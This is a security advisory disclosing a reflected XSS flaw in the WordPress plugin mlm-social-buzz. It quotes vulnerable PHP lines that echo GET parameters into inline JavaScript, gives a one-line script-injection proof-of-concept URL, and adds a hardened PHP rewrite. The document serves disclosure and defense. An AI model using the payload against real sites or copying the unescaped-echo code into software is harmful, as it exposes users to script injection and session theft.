Advisory #: 31
Title: Reflected XSS in wordpress plugin mlm-social-buzz v1.2.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/mlm-social-buzz
Downloads: 1480
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: mlm-social-buzz
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./mlm-social-buzz/top-blog-posts.php (file line numbers shown):

179: document.domain = '<?php echo $_GET["tbpv_domain"]; ?>';
182: /*document.write('<div style="display:none;"><a id="tbpv_login" href="<?php //echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to='+location1[0]+'&tbpv_affiliate=<?php //echo $_GET["tbpv_affiliate"]; ?>" target="_blank">Login</a></div>');
184: window.open("<?php echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to="+location1[0]+"&tbpv_affiliate=<?php echo $_GET["tbpv_affiliate"]; ?>","","menubar=0,resizable=1,status=1,toolbar=0,location=0");
187: parent.show_login_form(<?php echo $_GET["tbpv_id"]; ?>, location.href, '<?php echo $_GET["tbpv_affiliate"]; ?>');
191: location.href = '<?php echo WEBSITE_URL; ?>top_blog_posts.php?tbpv_id=<?php echo $_GET["tbpv_id"]; ?>&tbpv_username=<?php echo urlencode($_GET["tbpv_username"]); ?>&tbpv_domain=<?php echo urlencode($_GET["tbpv_domain"]); ?>&tbpv_affiliate=<?php echo urlencode($_GET["tbpv_affiliate"]); ?>&tbpv_button_style=<?php echo urlencode($_GET["tbpv_button_style"]); ?>';
199: document.domain = '<?php echo $_GET["tbpv_domain"]; ?>';
202: /*document.write('<div style="display:none;"><a id="tbpv_login" href="<?php //echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to='+location1[0]+'&tbpv_affiliate=<?php //echo $_GET["tbpv_affiliate"]; ?>" target="_blank">Login</a></div>');
204: window.open("<?php echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to="+location1[0]+"&tbpv_affiliate=<?php echo $_GET["tbpv_affiliate"]; ?>","","menubar=0,resizable=1,status=1,toolbar=0,location=0");
207: parent.show_login_form_follow(location.href,'<?php echo $_GET["tbpv_affiliate"]; ?>');

The variable tbpv_domain appears to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File: ./mlm-social-buzz/top-blog-posts.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there could be more, as shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/mlm-social-buzz/top-blog-posts.php?tbpv_domain="><script>alert(1);</script><"
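The following is an added example, not code from the plugin or from the advisory's author, showing how the inline script quoted under "Vulnerability:" could be rendered with each GET value validated or encoded for its context instead of echoed raw. The function names, the hostname rule for tbpv_domain, and the https://example.invalid/ placeholder standing in for WEBSITE_URL are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code): hardened rendering of the parameters
// that top-blog-posts.php echoes unescaped into inline JavaScript.
// Function names and the placeholder URL are assumptions for illustration.

// Validate tbpv_domain as a hostname and reject anything else rather than
// escaping it: document.domain must be a real domain, so a value containing
// quotes, angle brackets or spaces is never legitimate.
function tbpv_valid_domain(string $raw): ?string {
    $raw = strtolower(trim($raw));
    // RFC 1123 style labels: letters, digits, hyphens; 1-63 chars each; 253 max total
    if ($raw === '' || strlen($raw) > 253) {
        return null;
    }
    if (!preg_match('/^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*$/', $raw)) {
        return null;
    }
    return $raw;
}

// Encode a value for placement inside a JavaScript string literal that is itself
// inside an HTML <script> block. json_encode with the JSON_HEX_* flags turns
// < > & ' " into \uXXXX escapes, so neither the JS parser nor the HTML parser
// can be broken out of (the "><script> payload becomes inert text).
function tbpv_js_string(string $value): string {
    $encoded = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    // json_encode returns false on invalid UTF-8; emit an empty literal rather than nothing
    return $encoded === false ? '""' : $encoded;
}

// Build the same inline script the plugin emits, with every GET value validated
// or encoded for the context it lands in.
function tbpv_render_script(array $get): string {
    $domain    = tbpv_valid_domain((string)($get['tbpv_domain'] ?? ''));
    $id        = (int)($get['tbpv_id'] ?? 0);      // numeric JS argument: cast, never echo raw
    $affiliate = (string)($get['tbpv_affiliate'] ?? '');
    $username  = (string)($get['tbpv_username'] ?? '');
    $style     = (string)($get['tbpv_button_style'] ?? '');

    $out = "<script>\n";
    if ($domain !== null) {
        $out .= "document.domain = " . tbpv_js_string($domain) . ";\n";
    }
    $out .= "parent.show_login_form(" . $id . ", location.href, " . tbpv_js_string($affiliate) . ");\n";

    // Redirect URL: urlencode each query value (the plugin already does this on
    // one of its lines) AND JS-encode the whole string for the literal it sits in.
    $query = http_build_query([
        'tbpv_id'           => $id,
        'tbpv_username'     => $username,
        'tbpv_domain'       => $domain ?? '',
        'tbpv_affiliate'    => $affiliate,
        'tbpv_button_style' => $style,
    ]);
    $base = 'https://example.invalid/'; // placeholder for the plugin's WEBSITE_URL constant
    $out .= "location.href = " . tbpv_js_string($base . 'top_blog_posts.php?' . $query) . ";\n";
    $out .= "</script>\n";
    return $out;
}

// Constructed sample input mirroring the advisory's test payload in tbpv_domain,
// plus a quote-and-closing-tag attempt in tbpv_affiliate.
$sample = [
    'tbpv_domain'    => '"><script>alert(1);</script><"',
    'tbpv_id'        => '7abc',
    'tbpv_affiliate' => "x'</script>",
];
echo tbpv_render_script($sample);
// With this input the document.domain line is omitted (invalid hostname), tbpv_id
// becomes 7, and the affiliate value is emitted as "x\u0027\u003C\/script\u003E".
```

The design choice worth noting is that the two parameters get different treatment: tbpv_domain has a narrow legitimate shape, so allow-list validation is the right control and anything else is dropped; tbpv_affiliate is free text, so it stays but is encoded for the JavaScript-string-inside-HTML context. Plain htmlspecialchars() would not be enough on its own for the `document.domain = '...'` line, since a single quote or backslash still terminates a JS literal.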